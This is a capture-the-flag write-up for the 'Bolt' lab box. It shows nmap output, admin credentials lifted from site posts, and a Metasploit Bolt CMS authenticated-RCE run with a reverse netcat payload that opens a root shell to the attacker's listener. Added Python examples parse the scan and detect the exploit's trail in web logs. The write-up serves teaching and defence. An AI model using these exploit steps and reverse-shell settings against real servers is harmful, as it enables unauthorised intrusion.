Bolt
Using nmap to scan and identify open ports and services:
nmap -Pn -sC -sV 10.10.77.161
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-16 11:37 IST
Nmap scan report for 10.10.77.161
Host is up (0.17s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 f3:85:ec:54:f2:01:b1:94:40:de:42:e8:21:97:20:80 (RSA)
| 256 77:c7:c1:ae:31:41:21:e4:93:0e:9a:dd:0b:29:e1:ff (ECDSA)
|_ 256 07:05:43:46:9d:b2:3e:f0:4d:69:67:e4:91:d3:d3:7f (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
8000/tcp open http (PHP 7.2.32-1)
|_http-title: Bolt | A hero is unleashed
|_http-generator: Bolt
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 404 Not Found
| Date: Sat, 16 Jul 2022 06:08:04 GMT
| Connection: close
| X-Powered-By: PHP/7.2.32-1+ubuntu18.04.1+deb.sury.org+1
| Cache-Control: private, must-revalidate
| Date: Sat, 16 Jul 2022 06:08:04 GMT
| Content-Type: text/html; charset=UTF-8
| pragma: no-cache
| expires: -1
| X-Debug-Token: 6aa03e
| <!doctype html>
| <html lang="en">
| <head>
| <meta charset="utf-8">
| <meta name="viewport" content="width=device-width, initial-scale=1.0">
| <title>Bolt | A hero is unleashed</title>
| <link href="https://fonts.googleapis.com/css?family=Bitter|Roboto:400,400i,700" rel="stylesheet">
| <link rel="stylesheet" href="/theme/base-2018/css/bulma.css?8ca0842ebb">
| <link rel="stylesheet" href="/theme/base-2018/css/theme.css?6cb66bfe9f">
| <meta name="generator" content="Bolt">
| </head>
| <body>
| href="#main-content" class="vis
| GetRequest:
| HTTP/1.0 200 OK
| Date: Sat, 16 Jul 2022 06:08:03 GMT
| Connection: close
| X-Powered-By: PHP/7.2.32-1+ubuntu18.04.1+deb.sury.org+1
| Cache-Control: public, s-maxage=600
| Date: Sat, 16 Jul 2022 06:08:03 GMT
| Content-Type: text/html; charset=UTF-8
| X-Debug-Token: c9575e
| <!doctype html>
| <html lang="en-GB">
| <head>
| <meta charset="utf-8">
| <meta name="viewport" content="width=device-width, initial-scale=1.0">
| <title>Bolt | A hero is unleashed</title>
| <link href="https://fonts.googleapis.com/css?family=Bitter|Roboto:400,400i,700" rel="stylesheet">
| <link rel="stylesheet" href="/theme/base-2018/css/bulma.css?8ca0842ebb">
| <link rel="stylesheet" href="/theme/base-2018/css/theme.css?6cb66bfe9f">
| <meta name="generator" content="Bolt">
| <link rel="canonical" href="http://0.0.0.0:8000/">
| </head>
|_ <body class="front">
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8000-TCP:V=7.92%I=7%D=7/16%Time=62D255C5%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,23DC,"HTTP/1\.0\x20200\x20OK\r\nDate:\x20Sat,\x2016\x20Jul\x20
SF:2022\x2006:08:03\x20GMT\r\nConnection:\x20close\r\nX-Powered-By:\x20PHP
SF:/7\.2\.32-1\+ubuntu18\.04\.1\+deb\.sury\.org\+1\r\nCache-Control:\x20pu
SF:blic,\x20s-maxage=600\r\nDate:\x20Sat,\x2016\x20Jul\x202022\x2006:08:03
SF:\x20GMT\r\nContent-Type:\x20text/html;\x20charset=UTF-8\r\nX-Debug-Toke
SF:n:\x20c9575e\r\n\r\n<!doctype\x20html>\n<html\x20lang=\"en-GB\">\n\x20\
SF:x20\x20\x20<head>\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20charset=\"u
SF:tf-8\">\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20name=\"viewport\"\x20
SF:content=\"width=device-width,\x20initial-scale=1\.0\">\n\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<title>Bolt\x20\|\x20A
SF:\x20hero\x20is\x20unleashed</title>\n\x20\x20\x20\x20\x20\x20\x20\x20<l
SF:ink\x20href=\"https://fonts\.googleapis\.com/css\?family=Bitter\|Roboto
SF::400,400i,700\"\x20rel=\"stylesheet\">\n\x20\x20\x20\x20\x20\x20\x20\x2
SF:0<link\x20rel=\"stylesheet\"\x20href=\"/theme/base-2018/css/bulma\.css\
SF:?8ca0842ebb\">\n\x20\x20\x20\x20\x20\x20\x20\x20<link\x20rel=\"styleshe
SF:et\"\x20href=\"/theme/base-2018/css/theme\.css\?6cb66bfe9f\">\n\x20\x20
SF:\x20\x20\t<meta\x20name=\"generator\"\x20content=\"Bolt\">\n\x20\x20\x2
SF:0\x20\t<link\x20rel=\"canonical\"\x20href=\"http://0\.0\.0\.0:8000/\">\
SF:n\x20\x20\x20\x20</head>\n\x20\x20\x20\x20<body\x20class=\"front\">\n\x
SF:20\x20\x20\x20\x20\x20\x20\x20<a\x20")%r(FourOhFourRequest,16C3,"HTTP/1
SF:\.0\x20404\x20Not\x20Found\r\nDate:\x20Sat,\x2016\x20Jul\x202022\x2006:
SF:08:04\x20GMT\r\nConnection:\x20close\r\nX-Powered-By:\x20PHP/7\.2\.32-1
SF:\+ubuntu18\.04\.1\+deb\.sury\.org\+1\r\nCache-Control:\x20private,\x20m
SF:ust-revalidate\r\nDate:\x20Sat,\x2016\x20Jul\x202022\x2006:08:04\x20GMT
SF:\r\nContent-Type:\x20text/html;\x20charset=UTF-8\r\npragma:\x20no-cache
SF:\r\nexpires:\x20-1\r\nX-Debug-Token:\x206aa03e\r\n\r\n<!doctype\x20html
SF:>\n<html\x20lang=\"en\">\n\x20\x20\x20\x20<head>\n\x20\x20\x20\x20\x20\
SF:x20\x20\x20<meta\x20charset=\"utf-8\">\n\x20\x20\x20\x20\x20\x20\x20\x2
SF:0<meta\x20name=\"viewport\"\x20content=\"width=device-width,\x20initial
SF:-scale=1\.0\">\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20<title>Bolt\x20\|\x20A\x20hero\x20is\x20unleashed</title>\n\x2
SF:0\x20\x20\x20\x20\x20\x20\x20<link\x20href=\"https://fonts\.googleapis\
SF:.com/css\?family=Bitter\|Roboto:400,400i,700\"\x20rel=\"stylesheet\">\n
SF:\x20\x20\x20\x20\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"/
SF:theme/base-2018/css/bulma\.css\?8ca0842ebb\">\n\x20\x20\x20\x20\x20\x20
SF:\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"/theme/base-2018/css/them
SF:e\.css\?6cb66bfe9f\">\n\x20\x20\x20\x20\t<meta\x20name=\"generator\"\x2
SF:0content=\"Bolt\">\n\x20\x20\x20\x20</head>\n\x20\x20\x20\x20<body>\n\x
SF:20\x20\x20\x20\x20\x20\x20\x20<a\x20href=\"#main-content\"\x20class=\"v
SF:is");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 58.61 seconds
We find 3 open ports: 22, 80 and 8000, running SSH and two web servers respectively.
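The scan output above is easier to act on once the port table is parsed into structured findings that can be compared against an allow-list of expected services. The following Python is an added example, not part of the original writeup; it parses the nmap normal-output lines shown above (a constructed excerpt is embedded inline) and reports open ports that are not on the allow-list. The regexes, the PortFinding dataclass and the allowed-port set are assumptions of this example.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: the port-table section of the scan above, trimmed to the
# lines this parser cares about (port lines and a few NSE script results).
SAMPLE_SCAN = """\
Nmap scan report for 10.10.77.161
Host is up (0.17s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
8000/tcp open http (PHP 7.2.32-1)
|_http-title: Bolt | A hero is unleashed
|_http-generator: Bolt
"""

# "<port>/<proto> <state> <service> <version...>" as printed in nmap's normal output.
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# NSE script result lines we want to keep per port ("|_name: value").
SCRIPT_LINE = re.compile(r"^\|_?\s*(http-title|http-generator|http-server-header):\s*(.*)$")


@dataclass
class PortFinding:
    port: int
    proto: str
    state: str
    service: str
    version: str
    scripts: dict = field(default_factory=dict)


def parse_nmap(text):
    """Turn nmap normal output into a list of PortFinding, attaching NSE lines to the port above them."""
    findings = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        m = PORT_LINE.match(line)
        if m:
            current = PortFinding(int(m.group(1)), m.group(2), m.group(3),
                                  m.group(4), m.group(5).strip())
            findings.append(current)
            continue
        s = SCRIPT_LINE.match(line)
        if s and current is not None:
            current.scripts[s.group(1)] = s.group(2).strip()
    return findings


def unexpected_services(findings, allowed_ports):
    """Inventory check: open ports that are not on the allow-list (the ones to investigate)."""
    return [f for f in findings if f.state == "open" and f.port not in allowed_ports]


if __name__ == "__main__":
    for f in unexpected_services(parse_nmap(SAMPLE_SCAN), allowed_ports={22, 80}):
        print(f"unexpected {f.port}/{f.proto} {f.service} {f.version} {f.scripts}")
```

With the allow-list {22, 80}, the only unexpected finding is port 8000, carrying the http-generator value "Bolt" from the NSE output, which is exactly the service the rest of the writeup focuses on.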
Going over to port 80, we see that it is a default Apache page. Dead end! But port 8000 takes us to a webpage built with Bolt CMS.
While exploring the webpage, we come across an entry, message-from-admin. From here, we get a potential username: bolt.
Another entry, message-for-it-department, is found. From it we get a password: boltadmin123.
Credentials: bolt:boltadmin123
Navigating to /bolt, we are redirected to /bolt/login, where we can use the credentials obtained above to log in to the admin panel.
We can determine that the CMS is Bolt 3.7.1.
Metasploit has an RCE module, exploit/unix/webapp/bolt_authenticated_rce, for Bolt CMS 3.7.0. It might work here.
This module needs an authenticated user to get a reverse shell, and we do have the credentials, so we enter the required options.
[msf](Jobs:0 Agents:0) exploit(unix/webapp/bolt_authenticated_rce) >> show options
Module options (exploit/unix/webapp/bolt_authenticated_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
FILE_TRAVERSAL_PATH ../../../public/files yes Traversal path from "/files" on the web server to "/root" on the server
PASSWORD boltadmin123 yes Password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.10.77.161 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 8000 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes Base path to Bolt CMS
URIPATH no The URI to use for this exploit (default is random)
USERNAME bolt yes Username to authenticate with
VHOST no HTTP server virtual host
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.11.66.165 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
2 Linux (cmd)
Running the module, we get a reverse shell as root:
[msf](Jobs:0 Agents:0) exploit(unix/webapp/bolt_authenticated_rce) >> run
[*] Started reverse TCP handler on 10.11.66.165:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Successfully changed the /bolt/profile username to PHP $_GET variable "kohq".
[*] Found 3 potential token(s) for creating .php files.
[+] Used token 1c3b9a04fc3cb01b6deb1b3106 to create uhgsvcorq.php.
[*] Attempting to execute the payload via "/files/uhgsvcorq.php?kohq=`payload`"
[!] No response, may have executed a blocking payload!
[*] Command shell session 1 opened (10.11.66.165:4444 -> 10.10.77.161:57448) at 2022-07-16 11:58:22 +0530
[+] Deleted file uhgsvcorq.php.
[+] Reverted user profile back to original state.
whoami
root
shell
[*] Trying to find binary 'python' on the target machine
[-] python not found
[*] Trying to find binary 'python3' on the target machine
[*] Found python3 at /usr/bin/python3
[*] Using `python` to pop up an interactive shell
[*] Trying to find binary 'bash' on the target machine
[*] Found bash at /bin/bash
root@bolt:~/public/files#
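The module output above leaves a recognisable trail on the web server: a POST to /bolt/profile (the profile edit), then a request for a .php file under /files/ whose query string carries shell substitution (`payload`), which the CMS should never be serving as executable PHP in the first place. As an added detection example that is not part of the original writeup, the following Python runs three rules over Apache combined-format access log lines and correlates a profile edit with a later PHP execution from the upload directory by the same client. The log lines are constructed for this example (the .php file name is reused from the output above, the query payload is replaced by a harmless `id`); the rule names, the 300-second window and the log format are assumptions.

```python
import re
from datetime import datetime
from urllib.parse import unquote, urlsplit

# Constructed Apache combined-log lines modelled on the module run above.
# Only the third line is malicious; the last two are ordinary site traffic.
SAMPLE_LOG = """\
10.11.66.165 - - [16/Jul/2022:11:57:40 +0530] "POST /bolt/login HTTP/1.1" 302 412 "-" "Mozilla/5.0"
10.11.66.165 - - [16/Jul/2022:11:57:55 +0530] "POST /bolt/profile HTTP/1.1" 302 398 "-" "Mozilla/5.0"
10.11.66.165 - - [16/Jul/2022:11:58:21 +0530] "GET /files/uhgsvcorq.php?kohq=%60id%60 HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.10.77.5 - - [16/Jul/2022:12:01:02 +0530] "GET /files/2022-07/photo.jpg HTTP/1.1" 200 51234 "-" "Mozilla/5.0"
10.10.77.5 - - [16/Jul/2022:12:01:03 +0530] "GET /theme/base-2018/css/theme.css HTTP/1.1" 200 9012 "-" "Mozilla/5.0"
"""

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Parse one combined-format line into a dict; returns None for lines that do not match."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), TS_FORMAT),
        "method": m.group("method"),
        "path": url.path,
        "query": unquote(url.query),  # decode %60 etc. before looking for metacharacters
        "status": int(m.group("status")),
    }


def classify(event):
    """Return the names of the per-request rules this event matches."""
    hits = []
    path = event["path"].lower()
    if path.startswith("/files/") and path.endswith(".php"):
        hits.append("php_executed_from_upload_dir")
    if "`" in event["query"] or "$(" in event["query"]:
        hits.append("shell_substitution_in_query")
    if event["method"] == "POST" and event["path"] == "/bolt/profile":
        hits.append("backend_profile_modified")
    return hits


def detect(log_text, window_seconds=300):
    """Run the rules over a log and add a correlation hit when a profile edit
    by a client is followed within window_seconds by a .php request under /files/."""
    events = [e for e in (parse_line(l) for l in log_text.splitlines()) if e]
    alerts = []
    last_profile_edit = {}  # ip -> timestamp of the most recent /bolt/profile POST
    for ev in events:
        hits = classify(ev)
        if "backend_profile_modified" in hits:
            last_profile_edit[ev["ip"]] = ev["ts"]
        if "php_executed_from_upload_dir" in hits:
            earlier = last_profile_edit.get(ev["ip"])
            if earlier and (ev["ts"] - earlier).total_seconds() <= window_seconds:
                hits.append("profile_edit_then_php_in_files")
        if hits:
            alerts.append({"ip": ev["ip"], "ts": ev["ts"], "path": ev["path"], "rules": hits})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_LOG):
        print(a["ts"].isoformat(), a["ip"], a["path"], ", ".join(a["rules"]))
```

On the sample, the profile edit alone fires one low-severity rule; the later /files/uhgsvcorq.php request fires all three per-request rules plus the correlation rule, while the image and stylesheet requests produce nothing. Hardening-wise, the web server should not execute PHP from the files upload directory at all, which would turn the third line into a 200 serving plain text rather than a shell.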
Finding flag.txt:
root@bolt:/root find / -name flag.txt -type f 2>/dev/null
/home/flag.txt
root@bolt:/root cat /home/flag.txt
While reading up on Bolt CMS, we come across the endpoint /bolt, which is the default directory for the Bolt CMS backend.